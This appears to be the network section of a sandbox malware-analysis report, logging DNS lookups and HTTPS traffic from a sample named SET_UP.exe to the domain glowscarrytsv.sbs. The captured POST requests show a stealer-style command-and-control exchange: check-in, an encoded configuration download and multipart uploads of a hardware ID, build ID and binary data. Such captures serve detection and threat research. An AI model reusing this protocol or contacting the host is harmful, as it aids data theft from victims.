                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Jan 6, 2025 15:15:08.003470898 CET192.168.2.41.1.1.10x50d6Standard query (0)glowscarrytsv.sbsA (IP address)IN (0x0001)false
                                                                                                Jan 6, 2025 15:15:31.061511993 CET192.168.2.41.1.1.10x842aStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Jan 6, 2025 15:15:08.015584946 CET1.1.1.1192.168.2.40x50d6No error (0)glowscarrytsv.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                                Jan 6, 2025 15:15:08.015584946 CET1.1.1.1192.168.2.40x50d6No error (0)glowscarrytsv.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                                Jan 6, 2025 15:15:31.070869923 CET1.1.1.1192.168.2.40x842aName error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                                                                HTTP Request Dependency Graph

                                                                                                • glowscarrytsv.sbs

                                                                                                HTTPS Proxied Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.449748188.114.97.34437620C:\Users\user\Desktop\SET_UP.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-06 14:15:08 UTC264OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 8
                                                                                                Host: glowscarrytsv.sbs
                                                                                                2025-01-06 14:15:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                Data Ascii: act=life
                                                                                                2025-01-06 14:15:09 UTC1127INHTTP/1.1 200 OK
                                                                                                Date: Mon, 06 Jan 2025 14:15:08 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=egltn4epsrf6mcasofn71pe3ia; expires=Fri, 02 May 2025 08:01:47 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZHpcxLTjVNJcR1kDekLADRt94OnJLMLsh5MyMjAOLzAJXJXDDIDbiICRQ%2Bpg0ADSnzlvBVTbG3fXVlQ7s%2FaXrNKeTdkA4PE2K5oe1qEyfheSLMvmQtYI5PlzWGdIYNG5q9iOJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8fdc5187293b42ef-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1784&min_rtt=1783&rtt_var=672&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=908&delivery_rate=1624026&cwnd=221&unsent_bytes=0&cid=51f212e02f8dc92f&ts=532&x=0"
                                                                                                2025-01-06 14:15:09 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                Data Ascii: 2ok
                                                                                                2025-01-06 14:15:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.449749188.114.97.34437620C:\Users\user\Desktop\SET_UP.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-06 14:15:09 UTC265OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 80
                                                                                                Host: glowscarrytsv.sbs
                                                                                                2025-01-06 14:15:09 UTC80OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ELVIRA&j=efdebde057a1df3f7c15b7f4da907c2d
                                                                                                2025-01-06 14:15:10 UTC1127INHTTP/1.1 200 OK
                                                                                                Date: Mon, 06 Jan 2025 14:15:09 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=uqjokaala4ibe7n6g6e1sr3r0e; expires=Fri, 02 May 2025 08:01:48 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=99R5E9fw6skwyPIFMI1JYqHAf7zXQaI76gGJwGfVscepsMbzGkiS29kZHE19KQjvfPxyE%2FE3cakbMXSwqhypPNkLko6dq34nwQCJp2kGArELHbRhHCWD6OHVh89i%2F6nN4I6fRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8fdc518d0cf672b9-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1845&min_rtt=1841&rtt_var=698&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=981&delivery_rate=1558164&cwnd=214&unsent_bytes=0&cid=25f05bd801a1f34a&ts=497&x=0"
                                                                                                2025-01-06 14:15:10 UTC242INData Raw: 33 61 38 38 0d 0a 5a 42 76 53 44 58 77 48 4d 41 31 69 74 78 4c 63 46 2b 53 4d 47 4b 69 70 79 68 61 75 71 57 44 46 4e 44 45 37 42 68 6e 67 66 67 67 66 4f 61 51 76 52 6a 4d 63 4c 78 48 53 4d 4f 5a 78 68 65 42 72 7a 59 58 6f 64 38 71 4c 57 71 4e 56 58 55 68 6a 4e 63 49 49 5a 55 59 68 74 47 77 51 64 46 55 68 51 4e 4a 71 2f 69 32 2f 39 7a 72 4e 78 2b 67 73 6a 4d 77 4b 70 31 56 64 57 57 64 79 6a 77 35 6b 42 33 4f 2b 61 68 52 69 55 32 6b 44 32 33 2b 35 63 6f 48 74 63 73 62 41 70 33 37 44 69 30 7a 6e 55 55 73 5a 50 44 75 74 47 33 77 46 56 72 4e 2b 46 79 56 4e 49 52 6d 56 64 37 49 31 33 71 35 35 7a 63 75 6d 63 4d 72 43 43 4b 31 63 56 56 68 69 63 35 41 58 62 67 78 7a 73 47 6b 56 61 46 70 39 44 74 46 34 73 6e 53 4c 37 54 71 45
                                                                                                Data Ascii: 3a88ZBvSDXwHMA1itxLcF+SMGKipyhauqWDFNDE7BhngfggfOaQvRjMcLxHSMOZxheBrzYXod8qLWqNVXUhjNcIIZUYhtGwQdFUhQNJq/i2/9zrNx+gsjMwKp1VdWWdyjw5kB3O+ahRiU2kD23+5coHtcsbAp37Di0znUUsZPDutG3wFVrN+FyVNIRmVd7I13q55zcumcMrCCK1cVVhic5AXbgxzsGkVaFp9DtF4snSL7TqE
                                                                                                2025-01-06 14:15:10 UTC1369INData Raw: 69 36 39 73 6a 4a 4e 43 39 47 52 51 53 48 56 75 6a 77 78 73 52 6d 62 2b 64 6c 35 69 58 69 39 59 6c 58 69 79 65 34 50 74 64 63 33 4b 71 47 62 44 79 77 47 76 58 6c 64 54 61 33 53 4e 45 6d 41 42 63 62 6c 6f 45 57 4a 61 61 51 2f 57 4d 50 41 31 67 66 59 36 6b 6f 75 49 5a 4d 2f 49 46 71 70 48 45 30 59 71 59 73 49 62 5a 6b 59 68 38 47 6b 51 5a 46 39 76 45 74 31 37 74 58 43 55 35 58 50 48 78 71 68 35 78 73 51 42 70 31 46 5a 55 32 74 78 68 68 46 6e 41 48 6d 77 4c 31 41 6c 56 58 64 41 6a 54 43 64 63 4a 62 70 64 74 79 4a 6b 6a 54 54 68 52 76 6e 55 56 38 5a 50 44 75 4b 47 57 6b 46 63 72 39 73 46 6d 35 41 62 78 4c 54 66 62 74 6e 67 4f 74 30 77 4d 69 36 66 73 4c 4e 41 61 35 64 57 6c 78 6a 66 38 4a 53 4b 67 46 68 38 44 64 65 52 46 39 6b 44 4e 39 6e 76 6a 57 5a 6f 47 4f
                                                                                                Data Ascii: i69sjJNC9GRQSHVujwxsRmb+dl5iXi9YlXiye4Ptdc3KqGbDywGvXldTa3SNEmABcbloEWJaaQ/WMPA1gfY6kouIZM/IFqpHE0YqYsIbZkYh8GkQZF9vEt17tXCU5XPHxqh5xsQBp1FZU2txhhFnAHmwL1AlVXdAjTCdcJbpdtyJkjTThRvnUV8ZPDuKGWkFcr9sFm5AbxLTfbtngOt0wMi6fsLNAa5dWlxjf8JSKgFh8DdeRF9kDN9nvjWZoGO
                                                                                                2025-01-06 14:15:10 UTC1369INData Raw: 4d 62 4e 44 61 70 61 45 78 63 6b 66 4a 70 63 4d 6b 5a 54 73 33 73 64 62 78 42 61 41 39 74 2b 75 57 50 47 38 54 54 54 69 36 39 34 6a 4a 4e 43 71 6c 64 62 58 33 5a 30 6a 78 39 6b 43 48 61 31 59 42 5a 6c 55 6d 49 46 30 58 75 31 64 6f 76 71 61 4d 44 4c 6f 48 48 4e 77 51 6a 6e 47 42 4e 65 66 44 76 61 58 46 73 52 63 76 4a 61 48 57 74 63 61 42 61 56 62 2f 42 73 78 75 6c 32 69 70 50 6f 65 63 54 4f 42 36 68 58 57 56 64 68 63 59 34 55 5a 41 56 72 76 32 73 65 61 56 70 6c 44 64 74 30 74 6e 79 4e 35 58 7a 4b 79 71 49 30 67 6f 73 46 76 78 59 4c 47 56 42 38 6a 68 46 6c 52 45 79 7a 59 52 42 69 52 43 38 66 6d 32 6e 2b 63 6f 71 75 49 6f 72 48 6f 58 54 48 77 51 61 6e 55 56 35 63 5a 33 79 42 45 57 30 4d 64 37 64 72 45 6d 78 66 61 51 44 53 64 4c 74 6e 67 2b 64 32 78 6f 76 6d
                                                                                                Data Ascii: MbNDapaExckfJpcMkZTs3sdbxBaA9t+uWPG8TTTi694jJNCqldbX3Z0jx9kCHa1YBZlUmIF0Xu1dovqaMDLoHHNwQjnGBNefDvaXFsRcvJaHWtcaBaVb/Bsxul2ipPoecTOB6hXWVdhcY4UZAVrv2seaVplDdt0tnyN5XzKyqI0gosFvxYLGVB8jhFlREyzYRBiRC8fm2n+coquIorHoXTHwQanUV5cZ3yBEW0Md7drEmxfaQDSdLtng+d2xovm
                                                                                                2025-01-06 14:15:10 UTC1369INData Raw: 33 70 54 78 4e 65 61 44 76 61 58 47 4d 50 61 37 35 68 46 32 68 55 5a 77 66 62 66 62 56 7a 6a 65 6c 39 7a 4d 61 67 65 63 6e 49 41 36 4e 63 51 56 70 76 63 59 38 57 4b 6b 67 35 74 33 64 65 50 52 4a 49 44 50 78 67 70 57 65 51 72 6d 57 45 30 75 68 7a 77 49 74 61 35 31 56 63 55 47 74 7a 69 68 4e 6c 41 6e 65 32 61 52 4e 67 58 57 55 53 33 58 36 7a 66 6f 6e 6c 61 4d 72 47 72 48 6a 49 77 77 6d 74 46 68 30 5a 59 32 50 43 52 43 6f 7a 64 4c 39 76 48 58 4d 53 63 45 37 4d 4d 4c 6c 35 78 72 59 36 78 73 57 6f 65 38 44 48 43 61 39 58 58 31 64 6a 66 6f 73 55 59 68 52 34 74 47 63 66 61 31 31 75 42 4e 42 31 75 6e 4b 43 36 48 57 4b 68 65 68 7a 31 49 74 61 35 33 6c 30 62 43 5a 61 75 46 78 31 53 47 44 77 61 42 49 6c 43 69 38 4d 31 6e 79 32 65 6f 44 6e 64 73 44 43 6f 33 6a 48 7a
                                                                                                Data Ascii: 3pTxNeaDvaXGMPa75hF2hUZwfbfbVzjel9zMagecnIA6NcQVpvcY8WKkg5t3dePRJIDPxgpWeQrmWE0uhzwIta51VcUGtzihNlAne2aRNgXWUS3X6zfonlaMrGrHjIwwmtFh0ZY2PCRCozdL9vHXMScE7MMLl5xrY6xsWoe8DHCa9XX1djfosUYhR4tGcfa11uBNB1unKC6HWKhehz1Ita53l0bCZauFx1SGDwaBIlCi8M1ny2eoDndsDCo3jHz
                                                                                                2025-01-06 14:15:10 UTC1369INData Raw: 57 56 6d 56 36 68 41 35 74 44 32 75 2b 59 68 46 74 57 6d 59 42 30 58 57 7a 63 34 72 6b 65 38 33 46 70 6e 79 4d 68 55 4b 67 54 68 4d 42 4a 46 71 53 42 33 67 51 64 4a 46 69 45 53 56 4e 49 52 6d 56 64 37 49 31 33 71 35 7a 32 4d 2b 6c 5a 73 58 4d 44 4b 68 56 51 56 68 70 63 4a 41 62 5a 51 4a 2b 76 47 6b 52 59 31 4e 71 43 74 6c 33 75 33 36 4a 34 6a 71 45 69 36 39 73 6a 4a 4e 43 69 56 31 41 54 6d 64 31 69 51 70 78 52 6d 62 2b 64 6c 35 69 58 69 39 59 6c 58 4f 31 66 6f 4c 75 64 73 72 50 70 58 54 65 78 41 57 67 58 31 68 4c 62 6e 79 46 46 32 49 4e 64 72 5a 39 45 6d 74 41 61 68 4c 48 4d 50 41 31 67 66 59 36 6b 6f 75 65 63 39 7a 62 41 65 56 6e 52 56 70 79 63 49 38 51 4b 68 6b 33 71 53 38 5a 61 52 49 33 51 4e 4e 2f 74 33 61 4a 37 33 50 47 78 71 31 39 79 63 6f 45 6f 31
                                                                                                Data Ascii: WVmV6hA5tD2u+YhFtWmYB0XWzc4rke83FpnyMhUKgThMBJFqSB3gQdJFiESVNIRmVd7I13q5z2M+lZsXMDKhVQVhpcJAbZQJ+vGkRY1NqCtl3u36J4jqEi69sjJNCiV1ATmd1iQpxRmb+dl5iXi9YlXO1foLudsrPpXTexAWgX1hLbnyFF2INdrZ9EmtAahLHMPA1gfY6kouec9zbAeVnRVpycI8QKhk3qS8ZaRI3QNN/t3aJ73PGxq19ycoEo1
                                                                                                2025-01-06 14:15:10 UTC1369INData Raw: 59 4d 49 44 4a 42 38 35 74 32 4e 65 50 52 4a 73 42 39 5a 78 74 48 79 4b 34 58 33 4f 32 61 4a 7a 33 73 6f 44 72 46 74 66 57 57 6c 32 69 42 31 6a 43 33 57 39 61 42 6c 71 56 79 39 4f 6c 58 65 6d 4e 64 36 75 57 38 66 41 70 43 2b 57 69 78 33 70 54 78 4e 65 61 44 76 61 58 47 6f 4d 66 4c 70 69 48 57 70 52 66 51 48 54 59 72 35 34 6a 50 78 77 77 63 36 6c 65 63 48 49 42 4b 46 64 58 30 74 74 65 34 45 58 4b 6b 67 35 74 33 64 65 50 52 4a 4d 46 38 4e 36 75 58 6d 51 35 58 76 4a 33 61 56 6b 6a 49 56 43 74 6c 46 43 47 54 78 74 6b 67 74 74 47 54 65 70 4c 78 6c 70 45 6a 64 41 30 33 6d 34 63 6f 44 67 61 4d 2f 4e 70 33 76 46 77 67 61 76 56 56 4e 64 59 48 79 48 48 32 59 4e 66 72 4e 67 47 6d 78 63 5a 67 2b 56 50 76 35 79 6e 71 34 69 69 75 71 7a 64 38 44 47 51 72 67 59 53 68 6c
                                                                                                Data Ascii: YMIDJB85t2NePRJsB9ZxtHyK4X3O2aJz3soDrFtfWWl2iB1jC3W9aBlqVy9OlXemNd6uW8fApC+Wix3pTxNeaDvaXGoMfLpiHWpRfQHTYr54jPxwwc6lecHIBKFdX0tte4EXKkg5t3dePRJMF8N6uXmQ5XvJ3aVkjIVCtlFCGTxtkgttGTepLxlpEjdA03m4coDgaM/Np3vFwgavVVNdYHyHH2YNfrNgGmxcZg+VPv5ynq4iiuqzd8DGQrgYShl
                                                                                                2025-01-06 14:15:10 UTC1369INData Raw: 33 4a 47 49 66 42 50 46 58 4e 58 61 42 61 58 52 62 31 37 69 4f 6c 73 69 74 53 58 4f 6f 7a 4b 51 76 39 76 53 68 6c 79 4f 39 70 4f 4a 45 5a 72 38 44 64 65 49 6c 46 39 45 74 4e 7a 71 48 62 42 30 45 54 74 33 61 4a 7a 33 4d 77 56 71 42 59 64 47 57 73 37 32 69 55 71 44 33 36 72 66 67 68 6f 51 6d 68 41 36 6a 37 2b 62 63 61 32 4f 76 2f 49 70 6e 72 4c 33 52 50 71 63 55 56 54 59 32 75 46 43 32 56 47 4e 2f 42 70 58 6a 30 42 49 55 44 52 59 66 34 74 31 72 77 68 6e 35 6a 2f 4a 4a 37 55 54 4c 34 57 52 52 6b 38 4b 63 78 63 65 45 59 68 38 43 67 64 64 30 42 70 41 38 4e 7a 2b 55 75 34 79 57 44 48 7a 62 39 6c 38 76 55 46 76 56 74 56 54 6e 55 33 6c 78 39 6b 43 48 36 6d 4c 31 41 6c 58 53 39 59 37 44 44 32 4e 62 6d 67 4f 74 4b 4c 38 44 54 35 79 41 79 70 55 55 56 49 4b 56 79 59
                                                                                                Data Ascii: 3JGIfBPFXNXaBaXRb17iOlsitSXOozKQv9vShlyO9pOJEZr8DdeIlF9EtNzqHbB0ETt3aJz3MwVqBYdGWs72iUqD36rfghoQmhA6j7+bca2Ov/IpnrL3RPqcUVTY2uFC2VGN/BpXj0BIUDRYf4t1rwhn5j/JJ7UTL4WRRk8KcxceEYh8Cgdd0BpA8Nz+Uu4yWDHzb9l8vUFvVtVTnU3lx9kCH6mL1AlXS9Y7DD2NbmgOtKL8DT5yAypUUVIKVyY
                                                                                                2025-01-06 14:15:10 UTC1369INData Raw: 6d 69 4c 30 59 6c 46 57 77 53 78 33 61 39 59 34 57 70 52 50 54 73 70 6e 50 4e 33 52 4b 77 57 57 31 6e 63 58 69 4d 45 6d 30 51 61 50 41 68 58 6d 6f 53 4e 7a 6d 56 4f 50 35 4b 79 4b 35 69 69 70 50 6f 51 63 2f 46 44 4b 42 41 51 68 52 44 64 59 55 64 66 42 5a 75 76 79 39 51 4a 56 51 76 57 49 63 2b 2f 6e 47 58 72 69 4b 61 6d 66 4d 68 6e 35 78 53 39 55 6b 64 51 43 52 74 77 6b 51 34 53 44 6d 69 4c 30 59 6c 46 57 77 53 78 33 61 39 59 34 57 70 52 50 54 73 70 6e 50 4e 33 52 4b 77 57 52 78 33 55 6c 71 38 49 6e 38 46 64 37 35 6f 43 48 51 53 49 55 44 61 4d 4f 5a 4d 78 71 59 36 39 59 58 6f 62 49 79 54 51 70 4a 56 58 56 64 6a 62 5a 4e 52 54 51 68 2b 73 58 6b 4f 63 6c 30 67 4c 75 4e 52 2f 6a 76 47 36 44 71 53 6d 65 59 30 79 4e 70 43 2f 77 59 42 41 6a 45 6f 31 55 77 34 47
                                                                                                Data Ascii: miL0YlFWwSx3a9Y4WpRPTspnPN3RKwWW1ncXiMEm0QaPAhXmoSNzmVOP5KyK5iipPoQc/FDKBAQhRDdYUdfBZuvy9QJVQvWIc+/nGXriKamfMhn5xS9UkdQCRtwkQ4SDmiL0YlFWwSx3a9Y4WpRPTspnPN3RKwWRx3Ulq8In8Fd75oCHQSIUDaMOZMxqY69YXobIyTQpJVXVdjbZNRTQh+sXkOcl0gLuNR/jvG6DqSmeY0yNpC/wYBAjEo1Uw4G
                                                                                                2025-01-06 14:15:10 UTC1369INData Raw: 47 4a 51 6f 76 4c 63 64 33 72 6e 62 47 6f 44 72 47 69 2f 41 30 77 64 6b 46 74 31 55 66 58 6e 35 38 77 67 4d 6b 48 7a 6d 6d 4c 30 59 32 48 43 38 53 6c 53 6a 2b 4d 6f 6a 6a 65 38 6e 46 71 32 62 65 7a 51 47 78 56 52 52 6e 57 6c 61 51 47 33 6f 46 4f 34 46 69 47 6e 4e 48 62 42 44 53 54 6f 42 59 6c 4f 6c 71 79 59 6d 45 63 38 48 48 50 4a 6c 68 51 6c 35 30 4f 61 51 66 66 41 55 35 2f 69 38 47 4a 51 6f 76 4c 63 64 33 72 6e 62 45 77 6e 33 48 78 2b 68 72 67 74 4a 43 73 52 59 4c 43 69 6f 37 6b 46 77 79 52 6a 36 7a 66 51 78 6a 55 58 6b 44 6b 6b 36 41 57 4a 54 70 61 73 6d 4a 6d 58 6e 49 33 52 65 6b 52 6c 52 6e 57 6c 61 51 47 33 6f 46 4f 35 56 56 58 46 52 45 62 41 44 62 64 2f 34 37 78 76 59 36 6b 6f 75 46 5a 73 76 62 41 65 56 7a 61 52 74 56 62 59 45 63 5a 41 45 35 2f 69
                                                                                                Data Ascii: GJQovLcd3rnbGoDrGi/A0wdkFt1UfXn58wgMkHzmmL0Y2HC8SlSj+Mojje8nFq2bezQGxVRRnWlaQG3oFO4FiGnNHbBDSToBYlOlqyYmEc8HHPJlhQl50OaQffAU5/i8GJQovLcd3rnbEwn3Hx+hrgtJCsRYLCio7kFwyRj6zfQxjUXkDkk6AWJTpasmJmXnI3RekRlRnWlaQG3oFO5VVXFREbADbd/47xvY6kouFZsvbAeVzaRtVbYEcZAE5/i


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.449750188.114.97.34437620C:\Users\user\Desktop\SET_UP.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-06 14:15:10 UTC279OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=TT526WWK16ZIQG
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 18140
                                                                                                Host: glowscarrytsv.sbs
                                                                                                2025-01-06 14:15:10 UTC15331OUTData Raw: 2d 2d 54 54 35 32 36 57 57 4b 31 36 5a 49 51 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 32 44 44 39 43 33 34 35 42 39 35 45 45 36 36 39 41 45 37 37 38 46 45 32 37 39 39 44 36 39 0d 0a 2d 2d 54 54 35 32 36 57 57 4b 31 36 5a 49 51 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 54 35 32 36 57 57 4b 31 36 5a 49 51 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 54 54 35 32 36 57 57
                                                                                                Data Ascii: --TT526WWK16ZIQGContent-Disposition: form-data; name="hwid"322DD9C345B95EE669AE778FE2799D69--TT526WWK16ZIQGContent-Disposition: form-data; name="pid"2--TT526WWK16ZIQGContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA--TT526WW
                                                                                                2025-01-06 14:15:10 UTC2809OUTData Raw: 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61
                                                                                                Data Ascii: ~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
                                                                                                2025-01-06 14:15:11 UTC1140INHTTP/1.1 200 OK
                                                                                                Date: Mon, 06 Jan 2025 14:15:11 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=e8finlbbev79aad137emu1jgfe; expires=Fri, 02 May 2025 08:01:50 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2BrWP%2Bbuf9wo25xaye0a%2Fw%2FUAj2QJB5zdGsnyBZzoTz1Gb1sm1%2B42zuB5xwkKxIvPvlQkeBxf2%2B3S6uLtCBWHWyWgjb3G90jimRrNEisqhrEeiMTiykNl7oxFpg%2BVIKRVRctRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8fdc5193da0a4352-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1598&rtt_var=608&sent=9&recv=22&lost=0&retrans=0&sent_bytes=2842&recv_bytes=19099&delivery_rate=1785932&cwnd=239&unsent_bytes=0&cid=97f72cebabc49236&ts=981&x=0"
                                                                                                2025-01-06 14:15:11 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                2025-01-06 14:15:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.449751188.114.97.34437620C:\Users\user\Desktop\SET_UP.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-06 14:15:12 UTC279OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=8KZNW321KQR41UQ
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 8767
                                                                                                Host: glowscarrytsv.sbs
                                                                                                2025-01-06 14:15:12 UTC8767OUTData Raw: 2d 2d 38 4b 5a 4e 57 33 32 31 4b 51 52 34 31 55 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 32 44 44 39 43 33 34 35 42 39 35 45 45 36 36 39 41 45 37 37 38 46 45 32 37 39 39 44 36 39 0d 0a 2d 2d 38 4b 5a 4e 57 33 32 31 4b 51 52 34 31 55 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 4b 5a 4e 57 33 32 31 4b 51 52 34 31 55 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 38 4b 5a 4e
